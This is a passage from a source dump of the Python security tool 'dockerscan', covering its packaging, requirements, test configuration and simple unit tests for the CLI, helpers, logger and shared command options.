49 | return wrapped_f()
50 |
51 |
52 | #
53 | # HERE MORE EXAMPLES OF CMD OPTIONS
54 | #
55 | # --------------------------------------------------------------------------
56 | # Options for "auto" command
57 | # --------------------------------------------------------------------------
58 | #
59 | # auto_options_list = (
60 | # click.option('-T', '--timeout', 'timeout', type=int, default=60,
61 | # help="max time to wait until actions are available"),
62 | # )
63 | #
64 | #
65 | # class auto_options(object):
66 | # def __call__(self, f):
67 | # def wrapped_f(*args):
68 | # fn = f
69 | # for option in reversed(auto_options_list):
70 | # fn = option(f)
71 | #
72 | # return fn
73 | #
74 | # return wrapped_f()
75 |
76 |
77 | __all__ = ("global_options",) # "auto_options")
78 |
--------------------------------------------------------------------------------
/pytest.ini:
--------------------------------------------------------------------------------
1 | [pytest]
2 | norecursedirs = docs *.egg-info .git apitest .tox examples thirdparty
3 |
4 | [run]
5 | omit = tests/*
--------------------------------------------------------------------------------
/requirements-dev.txt:
--------------------------------------------------------------------------------
1 | sphinx
2 | alabaster
3 |
--------------------------------------------------------------------------------
/requirements-performance.txt:
--------------------------------------------------------------------------------
1 | ujson
--------------------------------------------------------------------------------
/requirements-runtest.txt:
--------------------------------------------------------------------------------
1 | pytest
2 | pytest-xdist
3 | pytest-asyncio
4 | pytest-coverage
5 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | click==6.7
2 | booby-ng==0.8.4
3 | requests
4 | colorlog==3.1.2
5 | python-dxf==5.1.1
6 |
7 | # If SSL Connections fails, install these depenencies
8 | # pyOpenSSL ndg-httpsclient pyasn1
9 |
--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | #
3 | # dockerscan
4 | #
5 | # Redistribution and use in source and binary forms, with or without
6 | # modification, are permitted provided that the
7 | # following conditions are met:
8 | #
9 | # 1. Redistributions of source code must retain the above copyright notice,
10 | # this list of conditions and the
11 | # following disclaimer.
12 | #
13 | # 2. Redistributions in binary form must reproduce the above copyright notice,
14 | # this list of conditions and the
15 | # following disclaimer in the documentation and/or other materials provided
16 | # with the distribution.
17 | #
18 | # 3. Neither the name of the copyright holder nor the names of its contributors
19 | # may be used to endorse or promote
20 | # products derived from this software without specific prior written
21 | # permission.
22 | #
23 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
24 | # AND ANY EXPRESS OR IMPLIED WARRANTIES,
25 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
26 | # FITNESS FOR A PARTICULAR PURPOSE ARE
27 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
28 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL,
29 | # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
30 | # PROCUREMENT OF SUBSTITUTE GOODS OR
31 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
32 | # CAUSED AND ON ANY THEORY OF LIABILITY,
33 | # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
34 | # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
35 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
36 | #
37 |
38 | import re
39 | import os
40 | import sys
41 | import codecs
42 |
43 | from os.path import dirname, join
44 | from setuptools import setup, find_packages
45 | from setuptools.command.test import test as TestCommand
46 |
47 |
48 | if sys.version_info < (3, 5,):
49 | raise RuntimeError("dockerscan requires Python 3.5.0+")
50 |
51 |
52 | #
53 | # Get version software version
54 | #
55 | version_file = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), "dockerscan")), '__init__.py')
56 | with codecs.open(version_file, 'r', 'latin1') as fp:
57 | try:
58 | version = re.findall(r"^__version__ = ['\"]([^']+)['\"]\r?$",
59 | fp.read(), re.M)[0]
60 | except IndexError:
61 | raise RuntimeError('Unable to determine version.')
62 |
63 |
64 | with open(join(dirname(__file__), 'requirements.txt')) as f:
65 | required = f.read().splitlines()
66 |
67 | with open(join(dirname(__file__), 'requirements-performance.txt')) as f:
68 | required_performance = f.read().splitlines()
69 |
70 | with open(join(dirname(__file__), 'README.rst')) as f:
71 | long_description = f.read()
72 |
73 |
74 | class PyTest(TestCommand):
75 | user_options = []
76 |
77 | def run(self):
78 | import subprocess
79 | import sys
80 | errno = subprocess.call([sys.executable, '-m', 'pytest', '--cov-report', 'html', '--cov-report', 'term', '--cov', 'dockerscan/'])
81 | raise SystemExit(errno)
82 |
83 |
84 | setup(
85 | name='dockerscan',
86 | version=version,
87 | install_requires=required,
88 | url='https://github.com/cr0hn/dockerscan',
89 | license='BSD',
90 | author='Daniel Garcia (cr0hn) / Roberto Munoz (robskye)',
91 | author_email='cr0hn@cr0hn.com',
92 | packages=find_packages(),
93 | include_package_data=True,
94 | extras_require={
95 | 'performance': required_performance
96 | },
97 | entry_points={'console_scripts': [
98 | 'dockerscan = dockerscan.actions.cli:cli',
99 | ]},
100 | description='A Docker analysis tools',
101 | long_description=long_description,
102 | classifiers=[
103 | 'Environment :: Console',
104 | 'Intended Audience :: System Administrators',
105 | 'Intended Audience :: Other Audience',
106 | 'License :: OSI Approved :: BSD License',
107 | 'Operating System :: MacOS',
108 | 'Operating System :: Microsoft :: Windows',
109 | 'Operating System :: POSIX',
110 | 'Programming Language :: Python :: 3.5',
111 | 'Topic :: Security',
112 | ],
113 | cmdclass=dict(test=PyTest)
114 | )
--------------------------------------------------------------------------------
/test/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/actions/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/actions/default/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/actions/default/api/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/actions/default/api/test_run_dockerscan.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 | from dockerscan.actions.default.api import run_default_dockerscan
4 |
5 |
6 | def test_run_default_dockerscan_runs_ok():
7 |
8 | #
9 | # FILL THIS WITH A TEST
10 | #
11 | # assert run_default_dockerscan() is None
12 | pass
13 |
14 |
15 | def test_run_default_dockerscan_empty_input():
16 |
17 | with pytest.raises(AssertionError):
18 | run_default_dockerscan(None)
19 |
--------------------------------------------------------------------------------
/test/unittesting/actions/default/cli/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/actions/default/cli/test_cli.py:
--------------------------------------------------------------------------------
1 | from click.testing import CliRunner
2 | from dockerscan.actions.default.cli import cli
3 |
4 |
5 | def test_parser_cli_runs_ok():
6 | runner = CliRunner()
7 | result = runner.invoke(cli, ["-h"])
8 |
9 | assert result.exit_code == 0
10 |
--------------------------------------------------------------------------------
/test/unittesting/actions/default/cli/test_cli_info.py:
--------------------------------------------------------------------------------
1 | import click
2 |
3 | from click.testing import CliRunner
4 |
5 | from dockerscan.actions.default.cli import info
6 |
7 | import dockerscan.actions.default.console
8 |
9 |
10 | def _launch_dockerscan_in_console(blah, **kwargs):
11 | click.echo("ok")
12 |
13 |
14 | def test_cli_info_runs_show_help():
15 | runner = CliRunner()
16 | result = runner.invoke(info)
17 |
18 | assert 'Usage: info [OPTIONS] ' in result.output
19 |
20 |
21 | def test_cli_info_runs_ok():
22 | # Patch the launch of: launch_dockerscan_info_in_console
23 | dockerscan.actions.default.cli.launch_dockerscan_in_console = _launch_dockerscan_in_console
24 |
25 | runner = CliRunner()
26 | result = runner.invoke(info, ["aaaa"])
27 |
28 | assert 'ok' in result.output
29 |
--------------------------------------------------------------------------------
/test/unittesting/core/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/core/helpers/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/core/helpers/test_dict_to_obj.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 | from dockerscan.core.helpers import dict_to_obj
4 |
5 |
6 | def test_dict_to_obj_response_ok():
7 |
8 | ret = dict_to_obj(dict(hello="world", bye="see you"))
9 |
10 | assert hasattr(ret, "hello")
11 | assert hasattr(ret, "bye")
12 |
13 |
14 | def test_dict_to_obj_response_invalid_input():
15 |
16 | with pytest.raises(AssertionError):
17 | dict_to_obj(None)
18 |
19 |
20 | def test_dict_to_obj_response_empty():
21 |
22 | assert issubclass(dict_to_obj({}), object)
23 |
--------------------------------------------------------------------------------
/test/unittesting/core/logger/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/core/logger/test_setup_logging.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 | from dockerscan.core.logger import setup_logging
4 |
5 |
6 | def test_setup_logging_runs_ok():
7 | assert setup_logging("blah") is None
8 |
9 |
10 | def test_setup_logging_runs_null_as_name():
11 |
12 | with pytest.raises(AssertionError):
13 | setup_logging(None)
14 |
15 |
16 | def test_setup_logging_runs_invalid_as_name():
17 | with pytest.raises(AssertionError):
18 | setup_logging(dict())
19 |
--------------------------------------------------------------------------------
/test/unittesting/core/shared_cmd_options/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/core/shared_cmd_options/test_global_options.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 | from dockerscan.core.shared_cmd_options import global_options
4 |
5 |
6 | def test_global_options_runs_ok():
7 |
8 | c = global_options()
9 |
10 | assert callable(c.__call__(lambda x: x)) is True
11 |
12 |
13 | def test_global_options_check_input_params():
14 |
15 | with pytest.raises(AssertionError):
16 | global_options(None)
17 |
--------------------------------------------------------------------------------
/test/unittesting/mains/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/test/unittesting/mains/test_apitest_comparer_main.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import pytest
3 |
4 | from dockerscan.__main__ import main
5 |
6 |
7 | def test_dockerscan___main__runs_ok():
8 | # This test checks that the main command line run well
9 |
10 | sys.argv = [sys.argv[0], "-h"]
11 |
12 | with pytest.raises(SystemExit) as e:
13 | main()
14 |
15 | assert str(e.value) == '0'
16 |
--------------------------------------------------------------------------------
/tox.ini:
--------------------------------------------------------------------------------
1 | [tox]
2 | envlist = py35,py36,flake8
3 |
4 | [testenv]
5 | deps =
6 | -rrequirements.txt
7 | -rrequirements-dev.txt
8 | commands = py.test
9 |
10 | [flake8]
11 | select=E501,E306,W,E
12 | exclude=.*,doc/,examples/,tests/,dist/,*egg*
--------------------------------------------------------------------------------